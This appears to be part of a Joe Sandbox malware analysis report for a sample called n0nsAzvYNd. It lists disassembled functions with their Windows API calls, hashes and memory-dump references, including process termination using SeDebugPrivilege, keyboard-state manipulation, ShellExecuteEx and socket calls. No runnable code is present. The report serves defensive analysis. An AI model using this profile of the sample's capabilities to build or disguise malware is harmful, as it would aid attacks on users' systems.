Opcode Fuzzy Hash: 981d0bbe9e45c77fa18ef9b13eefb45fddb443f264e7d38026c8476bf63c554a
Instruction Fuzzy Hash: 2641D070A00318ABDB219F64DC85BEF77B8EF08350F91042AF984E7291D6759D898B68

Function 0041E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00403C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00403C7A
Part of subcall function 00403C55: Process32FirstW.KERNEL32(00000000,?), ref: 00403C88
Part of subcall function 00403C55: CloseHandle.KERNEL32(00000000), ref: 00403D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041E9A4
GetLastError.KERNEL32 ref: 0041E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041EA63
GetLastError.KERNEL32(00000000), ref: 0041EA6E
CloseHandle.KERNEL32(00000000), ref: 0041EAA3

Strings

SeDebugPrivilege, xrefs: 0041E9C2

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 652cc7c41f093a7ee2a402e9f58a24b7035aea1d7d9dc5ce9945a13e93377ff0
Instruction ID: 5ae738ef23882f05f4a8ff45ea65e3bd044480ee6b95643abee8b792c244c490
Opcode Fuzzy Hash: 652cc7c41f093a7ee2a402e9f58a24b7035aea1d7d9dc5ce9945a13e93377ff0
Instruction Fuzzy Hash: 1041AE713002019FDB15EF14CC96FAEB7A5AF45354F44842AFA065F3D2CB78A849CB99

Function 00402F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00403033

Strings

warning, xrefs: 0040301C
stop, xrefs: 00403004
blank, xrefs: 00402FB5
info, xrefs: 00402FD4
question, xrefs: 00402FEC

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: ff71bb5010c0473201cb745922c821ad85d6a4a2624e05abafcfb88945ba1538
Instruction ID: 88c7ad301a7b49bbfc13298d51f61e43d7534bcc0b73e1bf6dff94676af6b09d
Opcode Fuzzy Hash: ff71bb5010c0473201cb745922c821ad85d6a4a2624e05abafcfb88945ba1538
Instruction Fuzzy Hash: E111383534934ABAE7159E14DC42E6B7B9C9F153A2B20003FF900B62C2EEB85F0556AD

Function 004042F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00404312
LoadStringW.USER32(00000000), ref: 00404319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0040432F
LoadStringW.USER32(00000000), ref: 00404336
_wprintf.LIBCMT ref: 0040435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0040437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00404357

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 3e3cf31e4d7a15006454f7efe9e56f4b12af38efd57ef472283ee4cbc9a17e3a
Instruction ID: 85ee56c9d14533c97b1353360a3ac8a6755f7b875b102441a17561ee26baf5df
Opcode Fuzzy Hash: 3e3cf31e4d7a15006454f7efe9e56f4b12af38efd57ef472283ee4cbc9a17e3a
Instruction Fuzzy Hash: B10171F2A00208BBD72197A0DD89FE6767CE708300F8040B6BB05E2051EA345E8A4B79

Function 0042D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003A2612: GetWindowLongW.USER32(?,000000EB), ref: 003A2623

GetSystemMetrics.USER32(0000000F), ref: 0042D47C
GetSystemMetrics.USER32(0000000F), ref: 0042D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0042D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0042D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0042D716
ShowWindow.USER32(00000003,00000000), ref: 0042D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0042D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0042D77D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: f41d7510b3848ac30e86a46b31563983b682f7d69125ecdfbd5f1b3d3121d8d7
Instruction ID: e77411ad57bdad3f5bf54003d869d862a36abd230d6300062cb4aa6c59e42e43
Opcode Fuzzy Hash: f41d7510b3848ac30e86a46b31563983b682f7d69125ecdfbd5f1b3d3121d8d7
Instruction Fuzzy Hash: C6B1AC31A00225EFDF14CF68D985BAE7BB1FF44701F48807AEC489B295D778A994CB94

Function 003A2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,003DC1C7,00000004,00000000,00000000,00000000), ref: 003A2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,003DC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 003A2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,003DC1C7,00000004,00000000,00000000,00000000), ref: 003DC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,003DC1C7,00000004,00000000,00000000,00000000), ref: 003DC286

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 60e4b9d5b29249a9816cbf7dc782b0bc70d725889acc0fce63caf254cfe28ebe
Instruction ID: ffc70a48aed08941d37b8374049b05d498407249769e8496e80a2d599b4d6264
Opcode Fuzzy Hash: 60e4b9d5b29249a9816cbf7dc782b0bc70d725889acc0fce63caf254cfe28ebe
Instruction Fuzzy Hash: C24131326146809BCB379B2CDC8CB6B7BA6EF87310F55882EE04747961CA759846D711

Function 004070C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004070DD

Part of subcall function 003C0DB6: std::exception::exception.LIBCMT ref: 003C0DEC
Part of subcall function 003C0DB6: __CxxThrowException@8.LIBCMT ref: 003C0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00407114
EnterCriticalSection.KERNEL32(?), ref: 00407130
_memmove.LIBCMT ref: 0040717E
_memmove.LIBCMT ref: 0040719B
LeaveCriticalSection.KERNEL32(?), ref: 004071AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004071BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 004071DE

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: e73d5774ca9b987ad3f27d5166f7edfd6ad667fef7f69d1c0896c20ab799640f
Instruction ID: 557d057c6ad75aa460f463b75ddd5427fb8cb57595dbdf065a6e4135f5ec6587
Opcode Fuzzy Hash: e73d5774ca9b987ad3f27d5166f7edfd6ad667fef7f69d1c0896c20ab799640f
Instruction Fuzzy Hash: F9318C31A00205EBCB11DFA4DC85EAAB778EF45710F5441BAF904EE286DB34AE15CBA5

Function 004261D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004261EB
GetDC.USER32(00000000), ref: 004261F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004261FE
ReleaseDC.USER32(00000000,00000000), ref: 0042620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00426246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00426257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0042902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00426291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004262B1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: fa3eeaa3b6c101b238fd510af9d6c5635217ebdb9a128af0c0186c391cc6b369
Instruction ID: a8e194b6cd16f40f70d656b1667fbb8397c16a3f865a3d73daf321990070403d
Opcode Fuzzy Hash: fa3eeaa3b6c101b238fd510af9d6c5635217ebdb9a128af0c0186c391cc6b369
Instruction Fuzzy Hash: B5315E72201210AFEB214F509C4AFAB3BA9EF49755F854075FE089A291C6759846CB78

Function 003FBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 003FBBC4
_memcmp.LIBCMT ref: 003FBBE6
_memcmp.LIBCMT ref: 003FBBFE
_memcmp.LIBCMT ref: 003FBC11
_memcmp.LIBCMT ref: 003FBC2B
_memcmp.LIBCMT ref: 003FBC3E
_memcmp.LIBCMT ref: 003FBC56
_memcmp.LIBCMT ref: 003FBC71

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: daea8ad026d66cd22bbe7f57b90ccbd612916632f070ba0a2881f6d6edb76d6e
Instruction ID: 0f92a7e10e36f80f4889ab955e544831f1b2335a89f77008e62dc54466aabea9
Opcode Fuzzy Hash: daea8ad026d66cd22bbe7f57b90ccbd612916632f070ba0a2881f6d6edb76d6e
Instruction Fuzzy Hash: F321D7F260120D7BF20A6612DE42FBBF76D9E19388F144015FF04DA643EB98DE1193A5

Function 0040EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

Part of subcall function 003BFC86: _wcscpy.LIBCMT ref: 003BFCA9

_wcstok.LIBCMT ref: 0040EC94
_wcscpy.LIBCMT ref: 0040ED23
_memset.LIBCMT ref: 0040ED56

Strings

X, xrefs: 0040ED93

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 1c91bedfe7ed7660c27378bc558356839817330789d8433c771adfb8e0c48e3d
Instruction ID: 66cacf1e4db758d7b2f2a6ab7934cab46a4ba6a19c76c00ac8c2b7a1a5c82759
Opcode Fuzzy Hash: 1c91bedfe7ed7660c27378bc558356839817330789d8433c771adfb8e0c48e3d
Instruction Fuzzy Hash: 1AC17E715083419FC715EF24C885A5BB7E4EF86310F00492EF899AB2A2DB34EC45CB96

Function 00416B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?), ref: 00416C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00416C21
WSAGetLastError.WSOCK32(00000000), ref: 00416C34
htons.WSOCK32(?), ref: 00416CEA
inet_ntoa.WSOCK32(?), ref: 00416CA7

Part of subcall function 003FA7E9: _strlen.LIBCMT ref: 003FA7F3
Part of subcall function 003FA7E9: _memmove.LIBCMT ref: 003FA815

_strlen.LIBCMT ref: 00416D44
_memmove.LIBCMT ref: 00416DAD

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 0943fe360d956c670dd5e29a2db2b74681c2c4d57e010d571ece89e9ac804fd8
Instruction ID: 8a5e21b3be92c03b10c937729df10a32ac1741c74fe67be746f4a3354a4f3223
Opcode Fuzzy Hash: 0943fe360d956c670dd5e29a2db2b74681c2c4d57e010d571ece89e9ac804fd8
Instruction Fuzzy Hash: FA810171208300ABC711EB24DC82FABB7A8EF85314F50492EF9469F292DB74ED45CB56

Function 003A1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 341752850ad8de51b52de9f4d677b0fcad125b9efab4155f62dbc0189df58eab
Instruction ID: e755c49d6d8f5470a715a1da2d1af259a4428dfaa0ef6d8e327639862e0b4381
Opcode Fuzzy Hash: 341752850ad8de51b52de9f4d677b0fcad125b9efab4155f62dbc0189df58eab
Instruction Fuzzy Hash: B2719C35904109EFCB16CF99CC49EBEBB79FF8A310F118159F915AA251C730AA11CFA4

Function 0042B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00DE58E0), ref: 0042B3EB
IsWindowEnabled.USER32(00DE58E0), ref: 0042B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0042B4DB
SendMessageW.USER32(00DE58E0,000000B0,?,?), ref: 0042B512
IsDlgButtonChecked.USER32(?,?), ref: 0042B54F
GetWindowLongW.USER32(00DE58E0,000000EC), ref: 0042B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0042B589

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: e49d98aa5ef567fd4eecdaa52580e27c48f9343ad7dcc8f2e5b8c6a18a30f831
Instruction ID: 838e9532588044a119f769412ff02e271a07369978bb0a2f9ae243fc99567cd4
Opcode Fuzzy Hash: e49d98aa5ef567fd4eecdaa52580e27c48f9343ad7dcc8f2e5b8c6a18a30f831
Instruction Fuzzy Hash: 5771A034700224EFDB25EF54E8D0FBA77B9EF09300F94406AEA4197362C739A951DB99

Function 0041F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041F448
_memset.LIBCMT ref: 0041F511
ShellExecuteExW.SHELL32(?), ref: 0041F556

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

Part of subcall function 003BFC86: _wcscpy.LIBCMT ref: 003BFCA9

GetProcessId.KERNEL32(00000000), ref: 0041F5CD
CloseHandle.KERNEL32(00000000), ref: 0041F5FC

Strings

@, xrefs: 0041F525

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 6a03c538f3df3bcc756780b899fe30a672a6bb24b6bd8bfcd3ca6a2021953377
Instruction ID: e5384960c4d019e71055658b414449a3cf9065ce93ac3256076c34b409b82505
Opcode Fuzzy Hash: 6a03c538f3df3bcc756780b899fe30a672a6bb24b6bd8bfcd3ca6a2021953377
Instruction Fuzzy Hash: 2761C271A00619DFCB15DF64C485AAEBBF5FF49310F14806AE81ABB351CB34AD46CB94

Function 00400F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00400F8C
GetKeyboardState.USER32(?), ref: 00400FA1
SetKeyboardState.USER32(?), ref: 00401002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00401030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0040104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00401095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 004010B8

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f3ba064c73e17713544e4abbaeea56cef7557c4a48ae9966612cfd59086fa9e5
Instruction ID: 72917204e792a38a840be6a404eefee8a0777afda648553625d887360d170636
Opcode Fuzzy Hash: f3ba064c73e17713544e4abbaeea56cef7557c4a48ae9966612cfd59086fa9e5
Instruction Fuzzy Hash: 4851E3606147D63DFB3642348C05BBBBEA95B06304F0885AEE1D46A9E3C2FC9CC9D759

Function 00400D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00400DA5
GetKeyboardState.USER32(?), ref: 00400DBA
SetKeyboardState.USER32(?), ref: 00400E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00400E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00400E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00400EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00400EC9

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7706ea2fde98b055bc2fe3fb550bdef7de397dd83b8fbd62af4e8e43a848fd5c
Instruction ID: a793fb5ef5981ee4410eacc5eb0f19cf7e2447e0d6d9c1b92473b3eed361d233
Opcode Fuzzy Hash: 7706ea2fde98b055bc2fe3fb550bdef7de397dd83b8fbd62af4e8e43a848fd5c
Instruction Fuzzy Hash: 5651E6A05146D53DFB324374CC45B7B7EA95F06300F0848AEE1D4765C2C3A9AC99E7A8

Function 004055FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0040560A
_wcsncpy.LIBCMT ref: 0040563F
_wcsncpy.LIBCMT ref: 00405671
_wcsncpy.LIBCMT ref: 004056A4
_wcsncpy.LIBCMT ref: 004056E6
_wcsncpy.LIBCMT ref: 00405720
_wcsncpy.LIBCMT ref: 0040574F

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: e04ad7972f06210ceb9a2220f261105782b8519539a2cf4d05da6ec1a5cd5fb5
Instruction ID: 3ecde30911f60a49237532f506e3b8b16b583bd44d00788e111342f5ba6e3cb4
Opcode Fuzzy Hash: e04ad7972f06210ceb9a2220f261105782b8519539a2cf4d05da6ec1a5cd5fb5
Instruction Fuzzy Hash: 8F41BD65C5061875CB12EBF48C46ECFB7B8DF05310F50896AE508E7161FB34AA45C79A

